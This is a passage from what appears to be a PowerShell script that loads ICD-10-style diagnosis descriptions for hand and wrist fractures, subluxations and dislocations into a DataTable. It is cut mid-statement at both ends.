of distal phalanx of right middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right middle finger","Nondisplaced fracture of distal phalanx of right middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right middle finger","Nondisplaced fracture of distal phalanx of right middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right middle finger","Nondisplaced fracture of distal phalanx of right middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right middle finger","Nondisplaced fracture of distal phalanx of right middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right middle finger","Nondisplaced fracture of distal phalanx of right middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right middle finger","Nondisplaced fracture of distal phalanx of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left middle finger","Nondisplaced fracture of distal phalanx of left middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left middle finger","Nondisplaced fracture of distal phalanx of left middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left middle finger","Nondisplaced fracture of distal phalanx of left middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left middle finger","Nondisplaced fracture of distal phalanx of left middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left middle finger","Nondisplaced fracture of distal phalanx of left middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left middle finger","Nondisplaced fracture of distal phalanx of left middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left middle finger","Nondisplaced fracture of distal phalanx of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right ring finger","Nondisplaced fracture of distal phalanx of right ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right ring finger","Nondisplaced fracture of distal phalanx of right ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right ring finger","Nondisplaced fracture of distal phalanx of right ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right ring finger","Nondisplaced fracture of distal phalanx of right ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right ring finger","Nondisplaced fracture of distal phalanx of right ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right ring finger","Nondisplaced fracture of distal phalanx of right ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right ring finger","Nondisplaced fracture of distal phalanx of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left ring finger","Nondisplaced fracture of distal phalanx of left ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left ring finger","Nondisplaced fracture of distal phalanx of left ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left ring finger","Nondisplaced fracture of distal phalanx of left ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left ring finger","Nondisplaced fracture of distal phalanx of left ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left ring finger","Nondisplaced fracture of distal phalanx of left ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left ring finger","Nondisplaced fracture of distal phalanx of left ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left ring finger","Nondisplaced fracture of distal phalanx of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right little finger","Nondisplaced fracture of distal phalanx of right little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right little finger","Nondisplaced fracture of distal phalanx of right little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right little finger","Nondisplaced fracture of distal phalanx of right little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right little finger","Nondisplaced fracture of distal phalanx of right little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right little finger","Nondisplaced fracture of distal phalanx of right little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right little finger","Nondisplaced fracture of distal phalanx of right little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right little finger","Nondisplaced fracture of distal phalanx of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left little finger","Nondisplaced fracture of distal phalanx of left little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left little finger","Nondisplaced fracture of distal phalanx of left little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left little finger","Nondisplaced fracture of distal phalanx of left little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left little finger","Nondisplaced fracture of distal phalanx of left little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left little finger","Nondisplaced fracture of distal phalanx of left little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left little finger","Nondisplaced fracture of distal phalanx of left little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left little finger","Nondisplaced fracture of distal phalanx of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of other finger","Nondisplaced fracture of distal phalanx of other finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of other finger","Nondisplaced fracture of distal phalanx of other finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of other finger","Nondisplaced fracture of distal phalanx of other finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of other finger","Nondisplaced fracture of distal phalanx of other finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of other finger","Nondisplaced fracture of distal phalanx of other finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of other finger","Nondisplaced fracture of distal phalanx of other finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of other finger","Nondisplaced fracture of distal phalanx of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified finger","Nondisplaced fracture of distal phalanx of unspecified finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified finger","Nondisplaced fracture of distal phalanx of unspecified finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified finger","Nondisplaced fracture of distal phalanx of unspecified finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified finger","Nondisplaced fracture of distal phalanx of unspecified finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified finger","Nondisplaced fracture of distal phalanx of unspecified finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified finger","Nondisplaced fracture of distal phalanx of unspecified finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified finger","Nondisplaced fracture of distal phalanx of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified wrist and hand","Unspecified fracture of unspecified wrist and hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified wrist and hand","Unspecified fracture of unspecified wrist and hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified wrist and hand","Unspecified fracture of unspecified wrist and hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified wrist and hand","Unspecified fracture of unspecified wrist and hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified wrist and hand","Unspecified fracture of unspecified wrist and hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified wrist and hand","Unspecified fracture of unspecified wrist and hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified wrist and hand","Unspecified fracture of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right wrist and hand","Unspecified fracture of right wrist and hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right wrist and hand","Unspecified fracture of right wrist and hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right wrist and hand","Unspecified fracture of right wrist and hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right wrist and hand","Unspecified fracture of right wrist and hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right wrist and hand","Unspecified fracture of right wrist and hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right wrist and hand","Unspecified fracture of right wrist and hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right wrist and hand","Unspecified fracture of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left wrist and hand","Unspecified fracture of left wrist and hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left wrist and hand","Unspecified fracture of left wrist and hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left wrist and hand","Unspecified fracture of left wrist and hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left wrist and hand","Unspecified fracture of left wrist and hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left wrist and hand","Unspecified fracture of left wrist and hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left wrist and hand","Unspecified fracture of left wrist and hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left wrist and hand","Unspecified fracture of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right wrist and hand","Unspecified subluxation of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right wrist and hand","Unspecified subluxation of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right wrist and hand","Unspecified subluxation of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left wrist and hand","Unspecified subluxation of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left wrist and hand","Unspecified subluxation of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left wrist and hand","Unspecified subluxation of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified wrist and hand","Unspecified subluxation of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified wrist and hand","Unspecified subluxation of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified wrist and hand","Unspecified subluxation of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right wrist and hand","Unspecified dislocation of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right wrist and hand","Unspecified dislocation of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right wrist and hand","Unspecified dislocation of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left wrist and hand","Unspecified dislocation of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left wrist and hand","Unspecified dislocation of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left wrist and hand","Unspecified dislocation of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified wrist and hand","Unspecified dislocation of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified wrist and hand","Unspecified dislocation of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified wrist and hand","Unspecified dislocation of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal radioulnar joint of right wrist","Subluxation of distal radioulnar joint of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal radioulnar joint of right wrist","Subluxation of distal radioulnar joint of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal radioulnar joint of right wrist","Subluxation of distal radioulnar joint of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal radioulnar joint of left wrist","Subluxation of distal radioulnar joint of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal radioulnar joint of left wrist","Subluxation of distal radioulnar joint of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal radioulnar joint of left wrist","Subluxation of distal radioulnar joint of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal radioulnar joint of unspecified wrist","Subluxation of distal radioulnar joint of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal radioulnar joint of unspecified wrist","Subluxation of distal radioulnar joint of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal radioulnar joint of unspecified wrist","Subluxation of distal radioulnar joint of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal radioulnar joint of right wrist","Dislocation of distal radioulnar joint of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal radioulnar joint of right wrist","Dislocation of distal radioulnar joint of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal radioulnar joint of right wrist","Dislocation of distal radioulnar joint of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal radioulnar joint of left wrist","Dislocation of distal radioulnar joint of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal radioulnar joint of left wrist","Dislocation of distal radioulnar joint of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal radioulnar joint of left wrist","Dislocation of distal radioulnar joint of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal radioulnar joint of unspecified wrist","Dislocation of distal radioulnar joint of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal radioulnar joint of unspecified wrist","Dislocation of distal radioulnar joint of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal radioulnar joint of unspecified wrist","Dislocation of distal radioulnar joint of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of radiocarpal joint of right wrist","Subluxation of radiocarpal joint of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of radiocarpal joint of right wrist","Subluxation of radiocarpal joint of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of radiocarpal joint of right wrist","Subluxation of radiocarpal joint of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of radiocarpal joint of left wrist","Subluxation of radiocarpal joint of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of radiocarpal joint of left wrist","Subluxation of radiocarpal joint of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of radiocarpal joint of left wrist","Subluxation of radiocarpal joint of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of radiocarpal joint of unspecified wrist","Subluxation of radiocarpal joint of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of radiocarpal joint of unspecified wrist","Subluxation of radiocarpal joint of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of radiocarpal joint of unspecified wrist","Subluxation of radiocarpal joint of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of radiocarpal joint of right wrist","Dislocation of radiocarpal joint of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of radiocarpal joint of right wrist","Dislocation of radiocarpal joint of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of radiocarpal joint of right wrist","Dislocation of radiocarpal joint of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of radiocarpal joint of left wrist","Dislocation of radiocarpal joint of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of radiocarpal joint of left wrist","Dislocation of radiocarpal joint of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of radiocarpal joint of left wrist","Dislocation of radiocarpal joint of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of radiocarpal joint of unspecified wrist","Dislocation of radiocarpal joint of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of radiocarpal joint of unspecified wrist","Dislocation of radiocarpal joint of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of radiocarpal joint of unspecified wrist","Dislocation of radiocarpal joint of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of midcarpal joint of right wrist","Subluxation of midcarpal joint of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of midcarpal joint of right wrist","Subluxation of midcarpal joint of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of midcarpal joint of right wrist","Subluxation of midcarpal joint of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of midcarpal joint of left wrist","Subluxation of midcarpal joint of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of midcarpal joint of left wrist","Subluxation of midcarpal joint of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of midcarpal joint of left wrist","Subluxation of midcarpal joint of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of midcarpal joint of unspecified wrist","Subluxation of midcarpal joint of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of midcarpal joint of unspecified wrist","Subluxation of midcarpal joint of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of midcarpal joint of unspecified wrist","Subluxation of midcarpal joint of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of midcarpal joint of right wrist","Dislocation of midcarpal joint of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of midcarpal joint of right wrist","Dislocation of midcarpal joint of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of midcarpal joint of right wrist","Dislocation of midcarpal joint of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of midcarpal joint of left wrist","Dislocation of midcarpal joint of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of midcarpal joint of left wrist","Dislocation of midcarpal joint of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of midcarpal joint of left wrist","Dislocation of midcarpal joint of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of midcarpal joint of unspecified wrist","Dislocation of midcarpal joint of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of midcarpal joint of unspecified wrist","Dislocation of midcarpal joint of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of midcarpal joint of unspecified wrist","Dislocation of midcarpal joint of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of carpometacarpal joint of right thumb","Subluxation of carpometacarpal joint of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of carpometacarpal joint of right thumb","Subluxation of carpometacarpal joint of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of carpometacarpal joint of right thumb","Subluxation of carpometacarpal joint of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of carpometacarpal joint of left thumb","Subluxation of carpometacarpal joint of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of carpometacarpal joint of left thumb","Subluxation of carpometacarpal joint of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of carpometacarpal joint of left thumb","Subluxation of carpometacarpal joint of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of carpometacarpal joint of unspecified thumb","Subluxation of carpometacarpal joint of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of carpometacarpal joint of unspecified thumb","Subluxation of carpometacarpal joint of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of carpometacarpal joint of unspecified thumb","Subluxation of carpometacarpal joint of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of carpometacarpal joint of right thumb","Dislocation of carpometacarpal joint of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of carpometacarpal joint of right thumb","Dislocation of carpometacarpal joint of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of carpometacarpal joint of right thumb","Dislocation of carpometacarpal joint of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of carpometacarpal joint of left thumb","Dislocation of carpometacarpal joint of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of carpometacarpal joint of left thumb","Dislocation of carpometacarpal joint of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of carpometacarpal joint of left thumb","Dislocation of carpometacarpal joint of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of carpometacarpal joint of unspecified thumb","Dislocation of carpometacarpal joint of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of carpometacarpal joint of unspecified thumb","Dislocation of carpometacarpal joint of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of carpometacarpal joint of unspecified thumb","Dislocation of carpometacarpal joint of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of other carpometacarpal joint of right hand","Subluxation of other carpometacarpal joint of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other carpometacarpal joint of right hand","Subluxation of other carpometacarpal joint of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other carpometacarpal joint of right hand","Subluxation of other carpometacarpal joint of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of other carpometacarpal joint of left hand","Subluxation of other carpometacarpal joint of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other carpometacarpal joint of left hand","Subluxation of other carpometacarpal joint of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other carpometacarpal joint of left hand","Subluxation of other carpometacarpal joint of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of other carpometacarpal joint of unspecified hand","Subluxation of other carpometacarpal joint of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other carpometacarpal joint of unspecified hand","Subluxation of other carpometacarpal joint of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of other carpometacarpal joint of unspecified hand","Subluxation of other carpometacarpal joint of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other carpometacarpal joint of right hand","Dislocation of other carpometacarpal joint of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other carpometacarpal joint of right hand","Dislocation of other carpometacarpal joint of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other carpometacarpal joint of right hand","Dislocation of other carpometacarpal joint of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other carpometacarpal joint of left hand","Dislocation of other carpometacarpal joint of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other carpometacarpal joint of left hand","Dislocation of other carpometacarpal joint of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other carpometacarpal joint of left hand","Dislocation of other carpometacarpal joint of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other carpometacarpal joint of unspecified hand","Dislocation of other carpometacarpal joint of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other carpometacarpal joint of unspecified hand","Dislocation of other carpometacarpal joint of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other carpometacarpal joint of unspecified hand","Dislocation of other carpometacarpal joint of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpal (bone), proximal end of right hand","Subluxation of metacarpal (bone), proximal end of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpal (bone), proximal end of right hand","Subluxation of metacarpal (bone), proximal end of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpal (bone), proximal end of right hand","Subluxation of metacarpal (bone), proximal end of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpal (bone), proximal end of left hand","Subluxation of metacarpal (bone), proximal end of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpal (bone), proximal end of left hand","Subluxation of metacarpal (bone), proximal end of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpal (bone), proximal end of left hand","Subluxation of metacarpal (bone), proximal end of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpal (bone), proximal end of unspecified hand","Subluxation of metacarpal (bone), proximal end of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpal (bone), proximal end of unspecified hand","Subluxation of metacarpal (bone), proximal end of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of metacarpal (bone), proximal end of unspecified hand","Subluxation of metacarpal (bone), proximal end of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpal (bone), proximal end of right hand","Dislocation of metacarpal (bone), proximal end of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpal (bone), proximal end of right hand","Dislocation of metacarpal (bone), proximal end of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpal (bone), proximal end of right hand","Dislocation of metacarpal (bone), proximal end of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpal (bone), proximal end of left hand","Dislocation of metacarpal (bone), proximal end of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpal (bone), proximal end of left hand","Dislocation of metacarpal (bone), proximal end of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpal (bone), proximal end of left hand","Dislocation of metacarpal (bone), proximal end of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpal (bone), proximal end of unspecified hand","Dislocation of metacarpal (bone), proximal end of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpal (bone), proximal end of unspecified hand","Dislocation of metacarpal (bone), proximal end of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpal (bone), proximal end of unspecified hand","Dislocation of metacarpal (bone), proximal end of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal end of right ulna","Subluxation of distal end of right ulna, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal end of right ulna","Subluxation of distal end of right ulna, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal end of right ulna","Subluxation of distal end of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal end of left ulna","Subluxation of distal end of left ulna, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal end of left ulna","Subluxation of distal end of left ulna, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal end of left ulna","Subluxation of distal end of left ulna, sequela") + $null = 